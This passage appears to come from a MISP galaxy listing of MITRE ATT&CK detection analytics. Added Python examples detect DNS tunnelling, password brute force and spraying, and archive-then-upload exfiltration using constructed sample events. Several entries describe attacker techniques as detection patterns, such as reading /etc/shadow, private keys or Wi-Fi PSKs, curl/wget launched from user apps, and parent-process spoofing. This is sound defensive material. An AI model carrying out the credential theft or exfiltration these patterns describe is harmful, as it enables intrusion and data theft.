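AN1121, AN1122, AN1123, AN1124, AN1125 and AN1181 all look for DNS queries that carry data rather than resolve names: high rates, long or encoded subdomains, mostly-unique labels, TXT/NULL record types, and a non-browser or non-management-plane source. The Python below is an added example, not MITRE's; the log shape, thresholds and constructed queries are assumptions. It aggregates queries per (source, process, registered domain), computes those traits, and reports a group when several coincide.

```python
"""Added example (not MITRE's): score DNS query series for tunnelling/C2 traits.
Log shape, thresholds and the constructed queries are assumptions of this illustration."""
import hashlib
import math
from collections import Counter, defaultdict

BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "chrome", "firefox", "safari"}
MIN_QUERIES = 20  # do not judge a (source, process, domain) on fewer queries


def split_name(qname):
    """Crude (registered domain, subdomain) split on the last two labels; a real
    deployment should use the Public Suffix List so co.uk-style domains split correctly."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def shannon_entropy(text):
    """Bits per character; about 4 for hex, 5 for base32, 6 for base64 payloads."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def profile(queries):
    """Aggregate per (src, process, registered domain). queries: dicts {ts, src, process?, qname, qtype}."""
    groups = defaultdict(list)
    for q in queries:
        domain, sub = split_name(q["qname"])
        groups[(q["src"], q.get("process"), domain)].append((q["ts"], sub, q["qtype"]))
    profiles = []
    for (src, proc, domain), rows in groups.items():
        ts = sorted(r[0] for r in rows)
        subs = [r[1] for r in rows]
        duration = max(ts[-1] - ts[0], 1)
        profiles.append({
            "src": src, "process": proc, "domain": domain, "count": len(rows),
            "per_minute": len(rows) * 60 / duration,
            "unique_ratio": len(set(subs)) / len(rows),
            "avg_sub_len": sum(map(len, subs)) / len(rows),
            "entropy": shannon_entropy("".join(subs)),
            "txt_null_ratio": sum(r[2] in ("TXT", "NULL") for r in rows) / len(rows),
        })
    return profiles


def detect(queries, min_reasons=3):
    """Return profiles that show at least min_reasons tunnelling traits."""
    findings = []
    for p in profile(queries):
        if p["count"] < MIN_QUERIES:
            continue
        reasons = []
        if p["per_minute"] >= 30:
            reasons.append("high query rate")
        if p["avg_sub_len"] >= 30:
            reasons.append("long subdomains")
        if p["avg_sub_len"] >= 12 and p["entropy"] >= 3.0:  # entropy is only meaningful on long labels
            reasons.append("high entropy (encoded payload)")
        if p["unique_ratio"] >= 0.8:
            reasons.append("mostly unique subdomains")
        if p["txt_null_ratio"] >= 0.5:
            reasons.append("TXT/NULL heavy")
        if p["process"] and p["process"] not in BROWSERS:
            reasons.append("non-browser process")
        if len(reasons) >= min_reasons:
            findings.append({**p, "reasons": reasons})
    return findings


# Constructed sample traffic (not real data): one tunnel, one browsing session, one legitimate script.
BASE = 1_700_000_000


def _tunnel(n):
    # 40 hex characters of payload per query (deterministic stand-in for encoded data), one query every 1.5 s
    return [{"ts": BASE + i * 1.5, "src": "10.0.0.21", "process": "python.exe", "qtype": "TXT",
             "qname": hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:40] + ".t.tunnel.example"}
            for i in range(n)]


def _browsing(n):
    hosts = ["www", "cdn", "mail", "static"]
    return [{"ts": BASE + i * 24, "src": "10.0.0.21", "process": "chrome.exe", "qtype": "A",
             "qname": f"{hosts[i % 4]}.example.com"} for i in range(n)]


def _script(n):
    return [{"ts": BASE + i * 60, "src": "10.0.0.21", "process": "python.exe", "qtype": "A",
             "qname": "api.github.com"} for i in range(n)]


SAMPLE_QUERIES = _tunnel(40) + _browsing(25) + _script(25)

if __name__ == "__main__":
    for f in detect(SAMPLE_QUERIES):
        print(f["process"], f["domain"], f["reasons"])
```

Splitting on the last two labels is a deliberate simplification; use the Public Suffix List in production or co.uk-style domains will be mis-grouped. Security products, CDNs and DNS-based reputation lookups legitimately emit long, high-entropy subdomains, so baseline per destination domain before alerting. The process field is only available from host telemetry (for example Sysmon Event ID 22 or eBPF); network-only sources such as resolver or ESXi syslog should group on the client address alone, which the code does when no process is present.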

Analytic 1215 - AN1215

Detects custom archiving by monitoring execution of Swift/Objective-C apps or scripts producing high-entropy files with non-standard headers. Correlates unified logs of abnormal NSFileHandle/NSData operations, memory use of XOR/bitwise operations, and file creation events.

Internal MISP references

UUID 1a39005f-28e7-4b07-85e2-14ffa0f6ea3b which can be used as unique global reference for Analytic 1215 - AN1215 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1215
mitre_platforms ['macOS']

Analytic 1152 - AN1152

Monitor VM-level DNS and network traffic logs for adversary-controlled domains or selective response behavior (e.g., dropped requests from security scanners).

Internal MISP references

UUID 4b16cb6e-7a81-4f97-a4ad-5e461e1cc154 which can be used as unique global reference for Analytic 1152 - AN1152 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1152
mitre_platforms ['ESXi']

Analytic 1521 - AN1521

Series of authentication failures (Event ID 4625) targeting the same or similar user accounts over time from one or more remote IPs.

Internal MISP references

UUID 52dfd8de-910a-4caa-98a7-6dcf44ef903e which can be used as unique global reference for Analytic 1521 - AN1521 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1521
mitre_platforms ['Windows']
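
AN1521 describes a run of 4625 failures against the same or similar accounts. The Python below is an added example, not MITRE's; the event shape, window and thresholds are assumptions. It keeps sliding windows per (source, account) and per source, so one pass separates brute force (many failures, one account), password spraying (one failure each against many accounts) and the case a responder cares about most, a 4624 success from the same source after a run of failures; the Sub Status code says whether the guesses were hitting real accounts.

```python
"""Added example (not MITRE's): sliding-window analysis of 4625 failures.
Event shape, thresholds and sample data are assumptions of this illustration."""
from collections import defaultdict, deque

WINDOW = 600             # seconds
BRUTE_FAILURES = 10      # failures against one account from one source
SPRAY_ACCOUNTS = 8       # distinct accounts failed from one source
SUB_STATUS = {           # common 4625 Sub Status codes
    "0xc000006a": "wrong password",
    "0xc0000064": "user does not exist",
    "0xc0000234": "account locked out",
    "0xc0000072": "account disabled",
}


def normalise_account(name):
    """Lower-case and drop a DOMAIN\\ prefix or @domain suffix so CORP\\JSmith and jsmith@corp match."""
    return name.lower().split("\\")[-1].split("@")[0]


def analyse(events):
    """events: time-ordered dicts {ts, event_id, account, src_ip, sub_status?}."""
    by_pair = defaultdict(deque)   # (src_ip, account) -> failure timestamps inside the window
    by_src = defaultdict(deque)    # src_ip -> (ts, account) failures inside the window
    alerted, alerts = set(), []
    for ev in events:
        acct, src, ts = normalise_account(ev["account"]), ev["src_ip"], ev["ts"]
        if ev["event_id"] == 4625:
            q = by_pair[(src, acct)]
            q.append(ts)
            while q and ts - q[0] > WINDOW:
                q.popleft()
            s = by_src[src]
            s.append((ts, acct))
            while s and ts - s[0][0] > WINDOW:
                s.popleft()
            if len(q) >= BRUTE_FAILURES and ("brute", src, acct) not in alerted:
                alerted.add(("brute", src, acct))
                alerts.append({"type": "brute_force", "src_ip": src, "account": acct, "failures": len(q),
                               "sub_status": SUB_STATUS.get(ev.get("sub_status", "").lower(), "unknown")})
            distinct = {a for _, a in s}
            if len(distinct) >= SPRAY_ACCOUNTS and ("spray", src) not in alerted:
                alerted.add(("spray", src))
                alerts.append({"type": "password_spray", "src_ip": src, "accounts": len(distinct)})
        elif ev["event_id"] == 4624:
            recent = [t for t in by_pair.get((src, acct), ()) if ts - t <= WINDOW]
            if len(recent) >= 3:
                alerts.append({"type": "success_after_failures", "src_ip": src, "account": acct,
                               "prior_failures": len(recent)})
    return alerts


def _fail(ts, account, src, sub="0xC000006A"):
    return {"ts": ts, "event_id": 4625, "account": account, "src_ip": src, "sub_status": sub}


# Constructed sample events (not real data).
BASE = 1_700_000_000
SAMPLE_EVENTS = sorted(
    [_fail(BASE + 15 * i, "CORP\\JSmith", "198.51.100.23") for i in range(12)]          # brute force over 3 min
    + [{"ts": BASE + 200, "event_id": 4624, "account": "jsmith", "src_ip": "198.51.100.23"}]  # then success
    + [_fail(BASE + 10 * i, f"user{i:02d}", "203.0.113.5", "0xC0000064") for i in range(9)]  # spray, names guessed
    + [_fail(BASE + 30, "alice", "10.0.0.8"), _fail(BASE + 45, "alice", "10.0.0.8")],       # two typos
    key=lambda e: e["ts"],
)

if __name__ == "__main__":
    for a in analyse(SAMPLE_EVENTS):
        print(a)
```

Sub Status 0xC0000064 (user does not exist) on a spray means the attacker is guessing names as well as passwords; 0xC000006A means the names are right. Normalising DOMAIN\user and user@domain to one key is what makes "similar accounts" comparable across log sources; lockout policies make the brute-force threshold easy to trip, so tune BRUTE_FAILURES below the domain lockout count.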

Analytic 1512 - AN1512

Processes (tar, curl, python scripts) accessing large file sets and initiating outbound HTTPS POST requests with payload sizes inconsistent with baseline activity. Defender perspective: detect abnormal sequence of file archival followed by encrypted uploads to external web services.

Internal MISP references

UUID 8a5a1b1e-336f-41af-8f30-2fa7e8e10fab which can be used as unique global reference for Analytic 1512 - AN1512 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1512
mitre_platforms ['Linux']
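
AN1511 and AN1512 describe the same exfiltration shape from two angles: a process that should not be talking to the network, or an upload whose bytes out dwarf its bytes in, toward a consumer web service, preceded on Linux by archiving the files. The Python below is an added example, not MITRE's; the telemetry shape, service list, size and ratio thresholds and sample events are assumptions. It flags flows on either condition and enriches a hit with a recently created archive of matching size on the same host.

```python
"""Added example (not MITRE's): correlate bulk file archival with upload-heavy flows to web services.
Telemetry shape, thresholds and sample data are assumptions of this illustration."""
from collections import defaultdict

WEB_SERVICES = ("dropbox.com", "dropboxapi.com", "dropboxusercontent.com", "drive.google.com",
                "googleapis.com", "onedrive.live.com", "sharepoint.com", "1drv.ms", "mega.nz")
NO_NETWORK_EXPECTED = {"winword.exe", "excel.exe", "powerpnt.exe", "notepad.exe"}
ARCHIVERS = {"tar", "zip", "7z", "7z.exe", "rar", "rar.exe", "powershell.exe"}
ARCHIVE_EXTENSIONS = (".zip", ".tgz", ".tar.gz", ".7z", ".rar")
MIN_UPLOAD_BYTES = 5 * 1024 * 1024
MIN_OUT_IN_RATIO = 10.0
ARCHIVE_WINDOW = 900  # seconds between archive creation and the upload


def is_web_service(dst_host):
    return dst_host.lower().endswith(WEB_SERVICES)


def assess(events):
    """events: time-ordered dicts, type 'file' {ts, host, process, path, bytes} or
    type 'flow' {ts, host, process, dst_host, dst_port, bytes_out, bytes_in}."""
    archives = defaultdict(list)  # host -> [(ts, path, bytes)] of recently written archives
    alerts = []
    for ev in events:
        proc = ev["process"].lower()
        if ev["type"] == "file":
            if proc in ARCHIVERS or ev["path"].lower().endswith(ARCHIVE_EXTENSIONS):
                archives[ev["host"]].append((ev["ts"], ev["path"], ev["bytes"]))
            continue
        out, inp = ev["bytes_out"], max(ev["bytes_in"], 1)
        reasons = []
        if proc in NO_NETWORK_EXPECTED and ev["dst_port"] == 443:
            reasons.append("process not expected to use the network")
        if is_web_service(ev["dst_host"]) and out >= MIN_UPLOAD_BYTES and out / inp >= MIN_OUT_IN_RATIO:
            reasons.append(f"upload-heavy flow to web service (ratio {out / inp:.0f}:1)")
        if reasons:
            # enrich: an archive of about the same size written on this host shortly before the flow
            for t, path, size in archives[ev["host"]]:
                if 0 <= ev["ts"] - t <= ARCHIVE_WINDOW and abs(out - size) / size <= 0.25:
                    reasons.append(f"archive {path} ({size} bytes) created {ev['ts'] - t:.0f}s earlier")
                    break
            alerts.append({"ts": ev["ts"], "host": ev["host"], "process": ev["process"],
                           "dst": ev["dst_host"], "bytes_out": out, "reasons": reasons})
    return alerts


# Constructed sample telemetry (not real data).
MB = 1024 * 1024
BASE = 1_700_000_000
SAMPLE_EVENTS = [
    {"type": "file", "ts": BASE, "host": "srv01", "process": "tar",
     "path": "/tmp/.cache/docs.tgz", "bytes": 48 * MB},
    {"type": "flow", "ts": BASE + 30, "host": "srv01", "process": "curl", "dst_host": "content.dropboxapi.com",
     "dst_port": 443, "bytes_out": 49 * MB, "bytes_in": 12 * 1024},         # archive then upload (AN1512)
    {"type": "flow", "ts": BASE + 60, "host": "ws12", "process": "WINWORD.EXE", "dst_host": "dl.dropboxusercontent.com",
     "dst_port": 443, "bytes_out": 2 * MB, "bytes_in": 4096},               # Word talking to Dropbox (AN1511)
    {"type": "flow", "ts": BASE + 90, "host": "ws12", "process": "chrome.exe", "dst_host": "drive.google.com",
     "dst_port": 443, "bytes_out": 20 * 1024, "bytes_in": 80 * MB},         # download: inverted ratio, benign
    {"type": "flow", "ts": BASE + 120, "host": "ws12", "process": "OneDrive.exe", "dst_host": "onedrive.live.com",
     "dst_port": 443, "bytes_out": 3 * MB, "bytes_in": 3 * MB},             # sync chatter, balanced
]

if __name__ == "__main__":
    for a in assess(SAMPLE_EVENTS):
        print(a)
```

Direction matters: a download from Google Drive has the same destination but an inverted ratio and is ignored, and sync clients produce roughly balanced traffic. Byte counts come from flow or proxy logs rather than TLS inspection, so this works on encrypted traffic; the archive-size match is what turns "large upload" into "staged data left the host".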

Analytic 1621 - AN1621

Detects enabling of reversible password encryption in Active Directory or Group Policy, suspicious PowerShell commands modifying AD user properties, and unusual account configuration changes correlated with policy modifications. Multi-event correlation links Group Policy edits, PowerShell command execution, and user account property changes to identify tampering with authentication encryption settings.

Internal MISP references

UUID 105ca36e-c3e0-48c4-ada3-7f8c4aa4430f which can be used as unique global reference for Analytic 1621 - AN1621 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1621
mitre_platforms ['Windows']

Analytic 1216 - AN1216

Detects the relocation of malicious executables via copy/move actions across suspicious folders (e.g., from Downloads to System32), followed by deletion of the original source or renaming to blend into legitimate binaries.

Internal MISP references

UUID 143f3057-237e-427f-911a-2aa7d64721f0 which can be used as unique global reference for Analytic 1216 - AN1216 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1216
mitre_platforms ['Windows']

Analytic 1162 - AN1162

Abuse of SaaS platforms such as Confluence, GitHub, SharePoint Online, or Slack to access excessive internal documentation or export source code/data. Includes use of tokens or browser automation from unapproved IPs.

Internal MISP references

UUID 3655f892-ed0d-4b76-9173-ecb7eebacd8a which can be used as unique global reference for Analytic 1162 - AN1162 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1162
mitre_platforms ['SaaS']

Analytic 1126 - AN1126

Creation or modification of .plist files in /Library/LaunchDaemons/, especially those with suspicious Program or ProgramArguments paths, combined with execution activity under launchd with elevated privileges. Detectable through correlated Unified Logs, file monitoring, and process telemetry.

Internal MISP references

UUID 4bb5b68e-1a01-498e-ae39-94f951e01cd9 which can be used as unique global reference for Analytic 1126 - AN1126 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1126
mitre_platforms ['macOS']

Analytic 1612 - AN1612

Detection of suspicious enumeration of local or domain accounts via command-line tools, WMI, or scripts.

Internal MISP references

UUID e576eaeb-2158-40f9-8edb-c119eac56442 which can be used as unique global reference for Analytic 1612 - AN1612 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1612
mitre_platforms ['Windows']

Analytic 1261 - AN1261

Detection of container image build activity directly on the host using Docker or Kubernetes APIs. Defenders may observe Docker build requests, anomalous Dockerfile instructions (such as downloading code from unknown IPs), or creation of new images followed by immediate deployment. This behavior chain typically consists of an unexpected image creation event correlated with outbound network communication to non-standard or untrusted destinations.

Internal MISP references

UUID f568a973-fb34-41aa-950f-f46457544564 which can be used as unique global reference for Analytic 1261 - AN1261 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1261
mitre_platforms ['Containers']

Analytic 1217 - AN1217

Detects binary movement or copying between untrusted and trusted paths (e.g., /tmp/ → /usr/bin/ or /etc/init.d/) that may indicate persistence attempts or cleanup of origin traces.

Internal MISP references

UUID 39aa9168-6f3b-4179-84f9-a6b8dcf90900 which can be used as unique global reference for Analytic 1217 - AN1217 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1217
mitre_platforms ['Linux']

Analytic 1172 - AN1172

Detects file movement or outbound TFTP/FTP transfers from ESXi host initiated via shell commands or injected scripts, particularly from scratch partitions or /tmp.

Internal MISP references

UUID 61e3802a-c95c-43c2-8749-139e0f750169 which can be used as unique global reference for Analytic 1172 - AN1172 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1172
mitre_platforms ['ESXi']

Analytic 1271 - AN1271

Anomalous creation or mounting of hidden partitions or virtual file systems. Defender view: detection of registry modifications linked to non-standard file systems, suspicious disk I/O patterns, or bootkit-like behavior where hidden volumes are accessed outside normal file system APIs.

Internal MISP references

UUID 8d7fb300-189d-4654-ba66-3612a8a4cf65 which can be used as unique global reference for Analytic 1271 - AN1271 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1271
mitre_platforms ['Windows']

Analytic 1127 - AN1127

Unusual enumeration of services and resources through cloud APIs such as AWS CLI describe-*, Azure Resource Manager queries, or GCP project listings. Defender perspective includes anomalous API calls, unexpected volume of service enumeration, and correlation of discovery with recently compromised sessions.

Internal MISP references

UUID fe8c1ef5-59ed-40c3-b7f6-eb560555ee22 which can be used as unique global reference for Analytic 1127 - AN1127 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1127
mitre_platforms ['IaaS']

Analytic 1721 - AN1721

Application vetting services could look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.

Internal MISP references

UUID 75a0da5c-9f2b-4e96-bb94-10c30f16a9a2 which can be used as unique global reference for Analytic 1721 - AN1721 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1721
mitre_platforms ['iOS']

Analytic 1712 - AN1712

Mobile security products can detect which applications can request device administrator permissions. Application vetting services could apply extra scrutiny to applications that request device administrator permissions. The user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing.

Internal MISP references

UUID f6be418e-3fed-4026-b665-f055465c7359 which can be used as unique global reference for Analytic 1712 - AN1712 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1712
mitre_platforms ['Android']

Analytic 1281 - AN1281

File access to NetworkManager connection configs and attempts to read PSK credentials from /etc/NetworkManager/system-connections/*.

Internal MISP references

UUID 1f3a6d61-9658-4c9b-92af-5c711206e3fa which can be used as unique global reference for Analytic 1281 - AN1281 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1281
mitre_platforms ['Linux']

Analytic 1182 - AN1182

Process execution that probes user activity artifacts (e.g., desktop files, registry history) following recent user login/unlock events.

Internal MISP references

UUID 5bd6658f-4391-4d77-bed8-9b141b0fa3ae which can be used as unique global reference for Analytic 1182 - AN1182 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1182
mitre_platforms ['Windows']

Analytic 1218 - AN1218

Detects movement of binaries to ~/Library/, /System/, or app bundle locations, especially after initial execution or download from Safari or Mail.

Internal MISP references

UUID 72540cd1-3ba6-4a4a-8866-a3113094196a which can be used as unique global reference for Analytic 1218 - AN1218 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1218
mitre_platforms ['macOS']

Analytic 1128 - AN1128

Enumeration of directories, applications, or service principals through APIs such as Microsoft Graph or Okta API. Defender perspective includes unexpected listing of users, roles, applications, and abnormal access to identity management endpoints.

Internal MISP references

UUID e2dd9fee-91b7-4e32-8031-69ed4d7b927c which can be used as unique global reference for Analytic 1128 - AN1128 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1128
mitre_platforms ['Identity Provider']

Analytic 1821 - AN1821

Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity and alerts users when their credentials have been used on a new device. Apple iCloud also provides notifications to users of account activity such as when credentials have been used.

Internal MISP references

UUID 6e3a93db-d2a6-43b7-9aa6-4dcf972f5e53 which can be used as unique global reference for Analytic 1821 - AN1821 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1821
mitre_platforms ['iOS']

Analytic 1812 - AN1812

Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay. The user can view a list of device administrators and applications that have registered Accessibility services in device settings. Applications that register an Accessibility service should be scrutinized further for malicious behavior.

Internal MISP references

UUID 7d2231b0-d62e-4d5f-bc26-99e7f14ec741 which can be used as unique global reference for Analytic 1812 - AN1812 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1812
mitre_platforms ['Android']

Analytic 1291 - AN1291

Detects rogue DHCP activity by monitoring syslog for dhclient messages assigning unauthorized DNS/gateway values. Packet capture or IDS can detect multiple competing DHCP OFFERs from non-authorized servers.

Internal MISP references

UUID 05d8ce15-eaeb-47f5-abb7-8f8868dd8aaa which can be used as unique global reference for Analytic 1291 - AN1291 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1291
mitre_platforms ['Linux']

Analytic 1129 - AN1129

Discovery of SaaS services connected to productivity platforms (e.g., Microsoft 365, Google Workspace). Defender perspective includes unexpected enumeration of enabled services, API integrations, or OAuth applications tied to user accounts.

Internal MISP references

UUID 19b6de3a-032f-4dc8-aa72-7cd952dfed59 which can be used as unique global reference for Analytic 1129 - AN1129 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1129
mitre_platforms ['Office Suite']

Analytic 1219 - AN1219

Detects firmware or script relocation attempts (e.g., CLI-based copy, move, or rename) between temporary partitions and config startup folders on routers or switches.

Internal MISP references

UUID 6b8a97fe-4e51-4409-9eab-f2795eb2ec74 which can be used as unique global reference for Analytic 1219 - AN1219 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1219
mitre_platforms ['Network Devices']

Analytic 1192 - AN1192

Detects guest VMs or management agents issuing HTTP(S) traffic to external services without a valid patch management or backup justification.

Internal MISP references

UUID 900bc498-4b81-43b6-bec2-3b55edc5c0ff which can be used as unique global reference for Analytic 1192 - AN1192 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1192
mitre_platforms ['ESXi']

Analytic 1331 - AN1331

Identify repeated DNS resolutions where the same domain name returns multiple IPs in short succession, combined with low TTL values and high query volume from unusual processes. Correlate with process lineage (e.g., Office apps spawning abnormal DNS lookups).

Internal MISP references

UUID 7e6e9c0e-737e-43ac-8cdd-5edbff4d6424 which can be used as unique global reference for Analytic 1331 - AN1331 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1331
mitre_platforms ['Windows']

Analytic 1313 - AN1313

Adversaries using WinRM to remotely execute commands, launch child processes, or access WMI. The detection chain includes service use, network activity, remote session logon, and process creation within a short temporal window.

Internal MISP references

UUID 9dab17bf-62c7-4187-90f4-7335790df7c0 which can be used as unique global reference for Analytic 1313 - AN1313 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1313
mitre_platforms ['Windows']

Analytic 1133 - AN1133

Monitor Windows Registry modifications to Winlogon keys (Shell, Userinit, Notify) that introduce new executable or DLL paths. Correlate these changes with subsequent DLL loading, image loads, or process creation originating from winlogon.exe or userinit.exe. Abnormal child process lineage or unauthorized binaries in C:\Windows\System32 may indicate abuse.

Internal MISP references

UUID e8569cdc-a018-4eee-95d9-5979cebae519 which can be used as unique global reference for Analytic 1133 - AN1133 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1133
mitre_platforms ['Windows']

Analytic 1143 - AN1143

Cloud-hosted VM or container generates spoofed UDP requests to third-party services on known amplifier ports, with high outbound-to-inbound traffic ratios in VPC Flow Logs.

Internal MISP references

UUID 08c69003-044c-46a5-b17a-7cb5b25f2d50 which can be used as unique global reference for Analytic 1143 - AN1143 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1143
mitre_platforms ['IaaS']

Analytic 1134 - AN1134

Correlates LNK file execution with embedded resource extraction or suspicious network activity following initial launch, often leading to payload delivery via disguised icons.

Internal MISP references

UUID 11dd0dbf-e880-43d2-99f7-4b6bf9d821fa which can be used as unique global reference for Analytic 1134 - AN1134 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1134
mitre_platforms ['Windows']

Analytic 1431 - AN1431

Detects use of 'esxcli system' or direct interpreter commands (e.g., busybox shell) invoked from SSH or host terminal unexpectedly.

Internal MISP references

UUID 533d13df-5317-45dd-a544-c26d0192d6b2 which can be used as unique global reference for Analytic 1431 - AN1431 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1431
mitre_platforms ['ESXi']

Analytic 1413 - AN1413

Detects non-browser processes that establish encrypted outbound connections (e.g., TLS/SSL) to unfamiliar or atypical destinations for the host/user, following a data staging or compression event.

Internal MISP references

UUID 6869578d-d3e8-4a3c-9717-0a188dc0bafe which can be used as unique global reference for Analytic 1413 - AN1413 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1413
mitre_platforms ['Windows']

Analytic 1341 - AN1341

Repeated failed authentication attempts to container APIs, control planes, or login shells across many user names using the same password.

Internal MISP references

UUID 70500794-7d3d-4538-8e88-ed6d5e998a8a which can be used as unique global reference for Analytic 1341 - AN1341 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1341
mitre_platforms ['Containers']

Analytic 1314 - AN1314

Cause→effect chain: (1) User-facing app (Office/PDF/archiver/browser) records an open/click or abnormal event, then (2) a downloaded file is created in a user-writable path and/or decompressed, (3) the parent user app spawns a living-off-the-land binary (e.g., powershell/cmd/mshta/rundll32/msiexec/wscript/expand/zip) or installer, and (4) immediate outbound HTTP(S)/DNS/SMB from the same lineage.

Internal MISP references

UUID dcd6253b-a986-4c8a-bd89-46389007ea83 which can be used as unique global reference for Analytic 1314 - AN1314 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1314
mitre_platforms ['Windows']

Analytic 1531 - AN1531

Detection of non-interactive or suspicious processes accessing Bluetooth interfaces and transmitting outbound traffic following file access or staging activity.

Internal MISP references

UUID 02fb4d83-d2db-4d49-acbc-85eff3b517d6 which can be used as unique global reference for Analytic 1531 - AN1531 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1531
mitre_platforms ['Windows']

Analytic 1351 - AN1351

A process explicitly forges its parent using EXTENDED_STARTUPINFO + PROC_THREAD_ATTRIBUTE_PARENT_PROCESS (UpdateProcThreadAttribute → CreateProcess[A/W]/CreateProcessAsUserW) or other Native API paths, resulting in mismatched/implausible lineage across ETW EventHeader ProcessId, Security 4688 Creator Process ID/Name, and sysmon ParentProcessGuid. Often paired with privilege escalation when the chosen parent runs as SYSTEM.

Internal MISP references

UUID 312f9f86-b987-483c-8b1d-955415eea946 which can be used as unique global reference for Analytic 1351 - AN1351 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1351
mitre_platforms ['Windows']

Analytic 1315 - AN1315

Cause→effect chain: (1) User app/browser/archiver logs an open/click or abnormal exit, (2) new executable/script/archive extracted into $HOME/Downloads, /tmp, or ~/.cache, (3) parent app spawns shell/interpreter (bash/sh/python/node/curl/wget) or desktop file, and (4) new outbound connection(s) from the child lineage.

Internal MISP references

UUID a6e7697d-f0b8-4fcc-b32a-fec5b28cd8f7 which can be used as unique global reference for Analytic 1315 - AN1315 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1315
mitre_platforms ['Linux']

Analytic 1513 - AN1513

Office apps or scripts writing files followed by xattr manipulation (to evade quarantine) and subsequent HTTPS uploads. Defender perspective: anomalous file modification + outbound TLS traffic originating from non-networking apps (Word, Excel, Preview).

Internal MISP references

UUID d49c13ed-df07-4bb3-a2dc-43411e5d402a which can be used as unique global reference for Analytic 1513 - AN1513 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1513
mitre_platforms ['macOS']

Analytic 1153 - AN1153

Unusual access to bash history, registry credentials paths, or private key files by unauthorized or scripting tools, with correlated file and process activity.

Internal MISP references

UUID d76081f4-26cd-4e62-91e8-4e4a3992dd90 which can be used as unique global reference for Analytic 1153 - AN1153 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1153
mitre_platforms ['Windows']

Analytic 1135 - AN1135

Abuse of extended attributes (xattrs) to embed hidden payloads into legitimate files. Defender perspective: detect anomalous use of setfattr or getfattr commands, or direct syscalls (setxattr, getxattr) where attributes are unusually large or contain encoded data. Behavior chain includes: (1) execution of setfattr with suspicious namespaces (user., trusted.), (2) file metadata modification inconsistent with file size/hash, and (3) subsequent process execution reading attributes followed by decoding activity.

Internal MISP references

UUID f398e8ff-8c61-4672-8ace-118b11a38515 which can be used as unique global reference for Analytic 1135 - AN1135 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1135
mitre_platforms ['Linux']

Analytic 1316 - AN1316

Cause→effect chain: (1) unified logs show application open/click or crash for Safari/Chrome/Office/Preview/archiver, (2) file write/extraction into ~/Downloads, /private/var/folders/* or ~/Library, (3) parent app spawns osascript/bash/zsh/curl/python or opens a quarantined app with Gatekeeper prompts, (4) network egress from child.

Internal MISP references

UUID 66107cd1-c123-4ad5-bb0b-62d8a9a451a6 which can be used as unique global reference for Analytic 1316 - AN1316 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1316
mitre_platforms ['macOS']

Analytic 1613 - AN1613

Enumeration of users and groups through suspicious shell commands or unauthorized access to /etc/passwd or /etc/shadow.

Internal MISP references

